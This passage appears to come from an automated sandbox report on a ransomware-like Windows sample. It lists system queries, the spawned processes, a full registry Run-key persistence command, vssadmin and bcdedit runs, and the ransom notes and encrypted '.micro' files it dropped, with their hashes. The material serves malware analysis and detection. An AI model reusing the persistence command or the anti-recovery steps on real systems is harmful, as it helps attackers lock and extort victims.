Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.html

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_00425DE6 GetSystemTimeAsFileTime,

0_2_00425DE6

Contains functionality to query windows version

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

0_2_0041F040

Queries the cryptographic machine GUID

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Queries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Startup

system is w7

94-61f847bcb69d0fe86ad7a4ba3f057be5.exe (PID: 2732 MD5: 61F847BCB69D0FE86AD7A4BA3F057BE5)

amhfnhe45.exe (PID: 2748 MD5: 61F847BCB69D0FE86AD7A4BA3F057BE5)

reg.exe (PID: 2816 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d C:\Users\admin\AppData\Roaming\amhfnhe45.exe /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)

bcdedit.exe (PID: 2952 MD5: 9473C7BDD77A204C0BB70B467740D326)

vssadmin.exe (PID: 2984 MD5: 6E248A3D528EDE43994457CF417BD665)

bcdedit.exe (PID: 3088 MD5: 9473C7BDD77A204C0BB70B467740D326)

bcdedit.exe (PID: 3116 MD5: 9473C7BDD77A204C0BB70B467740D326)

bcdedit.exe (PID: 3140 MD5: 9473C7BDD77A204C0BB70B467740D326)

bcdedit.exe (PID: 3164 MD5: 9473C7BDD77A204C0BB70B467740D326)

cmd.exe (PID: 2776 cmdline: C:\Windows\system32\cmd.exe /c DEL C:\94-61F~1.EXE MD5: AD7B9C14083B52BC532FBA5948342B98)

svchost.exe (PID: 3056 MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\$Recycle.Bin\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\$Recycle.Bin\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_clwireg.txt.micro (copy)	Type: MD5: 7F1A4737129FBABCAC28401F4E582469 SHA: A75D2877193FBBA69F16838D5E32D8EF39DF52F8 SHA-256: CBC2C14D955A7E5957793800346FDBA5BA06825A81C206C585E89002BC5ABF38 SHA-512: 94BBE73B3B995616FFA6CC9DD3FF205E7AAEFDD0B205401214C6008DA7A634800B5817A98D004E49B0E1CC771060B8826C1D86F1F7FC2141996C808861D08322
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.micro (copy)	Type: MD5: C05080E414520D5E62071A39DC1DA5E9 SHA: B7C1D10E8C8E26C487F3E79885D51B776D6D4069 SHA-256: 74D65269A40A87BAF731B77B9772C247F5BEB09345B2F0E435823C9502EE229B SHA-512: 197DB4C114126EBC00A8A1D89E067EE6C22E2766FEF335311F1C138D7059C4FA989AA2C812C50BC53D0C9955AC0B775A5652F93A5A34DC82B232C24A90F8D650
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Garden.jpg.micro (copy)	Type: MD5: 6952A08D3EB608E6EE2D402FAF2507C7 SHA: 012A0A15F75E5D093AF519AE8CAC076A04C74D6A SHA-256: 9D8E9D4BACC61DE97D54F8EB7E92168923FDF564CB434523721B71BA6C999568 SHA-512: 8CAFC64B534286F061FD5D273FC8BC361D04054CAB6C573D7A9A59D862AA05833DE2737AF7867850B00D64BC39AC89DA1ADCA878B716CB86034835D302DCD89E
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.micro (copy)	Type: MD5: D8830765F3B13671B7CB0A6565D504F7 SHA: 38DF88663671C19EF158565B73CF4355495C58B0 SHA-256: D20B06FF095DED383B9E67CF2162F08CB23975D789BF60575050E36A25BC93DD SHA-512: BF3084FC7310385691EEDB5348E65C46811A5C77FDE8AB164A36D2725665EB48F003CCC5AB98D7BDF9C962762DDEC420FC2C789BEDA550E3B67AD6BA514FD410
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\HandPrints.jpg.micro (copy)	Type: MD5: ABD31EBD4E2F987718B09CEF3E372D6B SHA: 3611CD3BC09542EAE1149BE020AF36B5DD6FD15C SHA-256: 52935E90BA762B0EF5804535EB2C9B9C569644FAB6F42DC4B47D4F268097C781 SHA-512: 613D96DB794552399CBC19356E8A8E05DF8F34042C577254A3E364AE837AF8501E1E5B1DE9D6AEAD629257D0FB7900506DC8EF78A6E4362FFC23EAAD6A907E5F
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Notebook.jpg.micro (copy)	Type: MD5: E35C68FCD96BF3FFA217D29EFFF5E763 SHA: 8D01BCB4CF2E0CDE77939271061EF7E873FFDFD7 SHA-256: 6468885249D8C761E313AD88DD9D101D53BCF94DFBAC606BBF30A775EC46C035 SHA-512: 3F74997162E9296E2F31807182C34F8150DB4D251D4E76A47D91676B922185D30CF1B1089756BE155392C6358A0A8FA3489945432A9AA106656509B24B2F0656
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.micro (copy)	Type: MD5: 45519FC23DD7B486FB26B372A705042E SHA: 5479B9A2DDA02291E31E2233CF819E5557B9C40D SHA-256: 9979418EFEEEAAC716D44C02AB01F1CC9A5D5583ACC53C84AFA3FF2B924737F3 SHA-512: D287817DCEC6DAA8700A7D828E78E069343F3F1696D9B2B19258CEFF5A1DF04AE90A41355DD51DF2D1780E09319EC2BDB170D5C3272183450EDF6ACA00AC0A3F
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Peacock.jpg.micro (copy)	Type: MD5: 3163A65A7375EC178059450D48AFACBB SHA: BEFE62D8B14934428CA306FB0542B944DC237D91 SHA-256: 468BAF11041AE291985E12DCA9432479E0B957E1206F2E0365245B5BF56FB028 SHA-512: 0BFC863288137D02E3DE40832CFA2A40F3C8FC99B2858D0DF33420C3422275C2644AEA152C6CCF84CBC8026B364C8AB7B4776D88254A4C9EECCBA43B5B8E3490
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.micro (copy)	Type: MD5: 7021F6A44A04169EDA96C1CF046D44DE SHA: 1E400A7319E2D69062F6B5CBA63BA1A090429352 SHA-256: 7005A40F42B103D4BE256DC3D9FB44F0B03A80B5BF1BC54319F3E8A79A9A07FB SHA-512: 243DD26989DD5FC34FE23495B3F065753508FF590C097A570C1E965009DC088099C7076A138BCD472A327B69357230FF309948E5EEE128F9614B1CFB33EA25A0
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.micro (copy)	Type: MD5: 3163A65A7375EC178059450D48AFACBB SHA: BEFE62D8B14934428CA306FB0542B944DC237D91 SHA-256: 468BAF11041AE291985E12DCA9432479E0B957E1206F2E0365245B5BF56FB028 SHA-512: 0BFC863288137D02E3DE40832CFA2A40F3C8FC99B2858D0DF33420C3422275C2644AEA152C6CCF84CBC8026B364C8AB7B4776D88254A4C9EECCBA43B5B8E3490
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.micro (copy)	Type: MD5: 4AD5542BD6B8B3605AFA30FB3BA3FA5B SHA: DF5CC42904A9615FB410EB1B284B4C8661760415 SHA-256: 7B4D1CA2FB4B155DD0294EB1102B39B7AC50654FA3867A7972712F044400D737 SHA-512: 7FB4C8D7B04C2D4964766956A2E07634B6986CBB9B124638F5DB6DC5778FC1F32149C7C9C8AFB2B20A8D8DF5FB08F6802CF1F322D77CCF10CF1E2D7654A3BDC0
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.micro (copy)	Type: MD5: 8A6E4913D3266B26DD307953951FF4A8 SHA: C38100B46A125EA685ACBCAA0A2FC68529B7963C SHA-256: BBAD5BA0F927B2FAD6594EE4CA581737A203840A4BB64F3527F534F3A02E9CD3 SHA-512: E31DB0EFF3E753A9878DDBBA08F6C001908038A88952DF4BBE56AB72297F6D9FBD6169C521D3673C3119B62A295E27295B5EF877B7AE2CEDD929AC029A2F783B
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.micro (copy)	Type: MD5: 8ACC2AB41D3C3FB8886C24EA125803A3 SHA: 79D9D7C1EAB89BFB5C3BE295BC6268CA4C8302A5 SHA-256: 7DA9C7DC7258F74B708BCFA37332136CEE8669A1FF194E9E5AFBBF47F36CB6F1 SHA-512: BEE8C6518AE3E79D318C0859E1FF4CE48C76F615538DC0217310D55418EC3E6A56D7B6A740C60B2A594B8F342EC848C07540DD2A637571DFF39E91C1E54AECD6
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Small_News.jpg.micro (copy)	Type: MD5: 07E19FD7FC900DBB0D313D42AB5D0F2E SHA: 17ACF9A0BABAEAA96AADDC8E097E240C8BE9FF67 SHA-256: 02218B123423C3FF527C600DE78FD4F19AE733D4021117AD01014CCE88840589 SHA-512: 8207CA64651ED1E4171E97322098734D40C9798AA067F79557D91EF4D7902B19757A8A10EA420B01114B9CB6651E52CCE88606F985A71DC60A770DF263C3B319
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.micro (copy)	Type: MD5: 156319D5268879170B681CDC1EBF2AEF SHA: 3B19348A9903044467A1CDFB25C8B6B17F8E82CC SHA-256: F637EFDC1417E561439BA092E673C101FB01CDFA9CF5617668FDA6CF216D9B35 SHA-512: 82F9215A2327EF978C6C4ADA1EA9471F3D8CDDF9C95386347200D649389C021AC268F7005052792649C37BE2560AB709CADC238671F1EAFFB06AC45DAF67629F
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.micro (copy)	Type: MD5: 1ADB1A0F1C4CAA0A7271F00154273121 SHA: 22FE9D1788FFD43E09F780E0D4C7C330850BB5B8 SHA-256: F24B3DFE56F98FF46F6B025FE469B5F6A061795CB0C7B708BDAF65B43D93DEA1 SHA-512: D8DCB67FD22281A3DED845926C0FFCF112C0DF1374A4D67894BEFD0569D658584E970FE43A48901FF8F619CE0699BD6EED995177D4E8D97A026026D5C492E671
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.micro (copy)	Type: MD5: B845CDD8EFB28377C1B923B95DA39EDB SHA: 4CF2EAB5E561FACC7F47037A9E7A38B29F427A8F SHA-256: C8E2CAABDFF46B33D2E849C86376AA591471E9FFBF815DAA3E93BE1C8DF88BD0 SHA-512: B839E8FAD5640FE1114EC71855A77ACC83D744F6833D9EFE9735C9FAEC144AFCD58C0DFE1069DAA1528B6044ECC2AF2CDA247F6316E447E6CF6A695D698120FD
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Microsoft Office 2003 Setup(0001)_Task(0001).txt.micro (copy)	Type: MD5: E2DB5E4EE36A2B12C873645CA75C63AC SHA: D8B7237BB5500706CA601B42EB386455A6E5D202 SHA-256: 00FC9352C2C41B2020F88DDF828686B4B67D16D4AF33081C0AAD12DC20DF12B0 SHA-512: 458F24B91EEC1FB30538E57F0A95506721C3852560328B8B270AC8D96F52EE46F832CD3563F684026102C3FE80D811EF404B58B876CBB5321574037E32130167
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_NDP40-KB2468871-v2-x86_decompression_log.txt.micro (copy)	Type: MD5: 43C625B6F8033C2F824DE19428A42E21 SHA: 9F7CA415A77725CACFC1DD756B3BCACCA7A5CFBA SHA-256: D382FDD3FDA00D5CE4846D7A6D0D138351BFE01B505CADA953F788826F255AAD SHA-512: 83DC74DC8784B2C37AE1A53873C4A8E1D5C5705B50DD686DB2B27E6F57DD1AF8C5059330FBCC66D707819534B4BF5686CF6F436B444AE036C02BD2BE08F5C58C
C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\DZGR304M\en[1].js.micro (copy)	Type: MD5: DB1C5C0B384448902E8CAB234C21A246 SHA: 057765BDCDAE8A82A04954B3C522BFB1A85718AA SHA-256: A327187C265F697798CF40C72B4297E37432B680B62B6142334C9954692C5C5B SHA-512: 215DC7E49DBA7B5B2AEFDB917CFD2E4AA8D3499F3870DEDF1CCBF9482214DAC7798506FA983843AF1CB3EF90125FB6E303467A945CECED870DB47EE674171C27
C:\Users\admin\AppData\Local\Adobe\AIH.38b81bf5b3fcb34b671773c86bde8befc0189cbb\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: B34C8729AD2DC3665443ACF97294A920 SHA: 3954742423EE6B7393084DC7C5704543AC965E56 SHA-256: 45D71A0D2B11EB4500C51E92480C60396DA5B883A40C8A56995CBB5870D55277 SHA-512: 41CE911F8B73E99101392E132C4B6136E648263DE3AD802D302C188F839FAC1AB62914A21822813E0D57F372083E20BE153B9FB24413528DEC62E33F4CC6C884
C:\Users\admin\AppData\Local\Adobe\AIH.38b81bf5b3fcb34b671773c86bde8befc0189cbb\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: E81DD39F2E24EFDDA642B5C403773746 SHA: 41A79C68F2E942C554EE0D938D43874872C774C6 SHA-256: 82909D9DC47E030D7C5E4078E8E5F6B73D1920D4E0985F617EE9E513FF8CC91E SHA-512: F658A14356C83877179EC8E87D540A6509254883AC2C323F156E264ACF2FBA490004E595F8A1E5FD4AF0A346CE18C1AA5BE462EA28A9D3C32A510F5BFF769EE1
C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Updater\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Updater\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Acrobat\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Acrobat\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Color\Profiles\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Color\Profiles\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Color\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Color\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 68E52B0EC09A918A4197FA7BE8EC0E1A SHA: F407E1BC65F5261E4528AAE9E1D9FF8ECF94BB9A SHA-256: 9699F3907B154ECE137568D770E6D6DF7868D374F5170F3199D63DE0720A412B SHA-512: C467BB8CEE4FE2576E312DA3E64080F69126ED906FA9B5C2A95A5DC3F1947EEC307A73D3A46ACA97C9AC50B9DBA439C96B28C11972829DE4877828432D266410
C:\Users\admin\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 90920308E9735D1331F860804248F750 SHA: A1CC2E3557EE2B97E2B5C630AA952737B85F5BC0 SHA-256: 54141D7BD5D53A63876AC25598F93486F2EC9262288D0755DB3EE67286FCA9C9 SHA-512: 0AD0F8889794E075206B0B7B7FE75FEAC554AA9AD39FB73CF18747A6443B5DCD74CB439FC07A68FF97487D32A3B06BAA8CAF9C2F042877F0119C2DB461896A34
C:\Users\admin\AppData\Local\Adobe\Reader 9.3\Setup Files\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 68E52B0EC09A918A4197FA7BE8EC0E1A SHA: F407E1BC65F5261E4528AAE9E1D9FF8ECF94BB9A SHA-256: 9699F3907B154ECE137568D770E6D6DF7868D374F5170F3199D63DE0720A412B SHA-512: C467BB8CEE4FE2576E312DA3E64080F69126ED906FA9B5C2A95A5DC3F1947EEC307A73D3A46ACA97C9AC50B9DBA439C96B28C11972829DE4877828432D266410
C:\Users\admin\AppData\Local\Adobe\Reader 9.3\Setup Files\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 90920308E9735D1331F860804248F750 SHA: A1CC2E3557EE2B97E2B5C630AA952737B85F5BC0 SHA-256: 54141D7BD5D53A63876AC25598F93486F2EC9262288D0755DB3EE67286FCA9C9 SHA-512: 0AD0F8889794E075206B0B7B7FE75FEAC554AA9AD39FB73CF18747A6443B5DCD74CB439FC07A68FF97487D32A3B06BAA8CAF9C2F042877F0119C2DB461896A34
C:\Users\admin\AppData\Local\Adobe\Reader 9.3\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
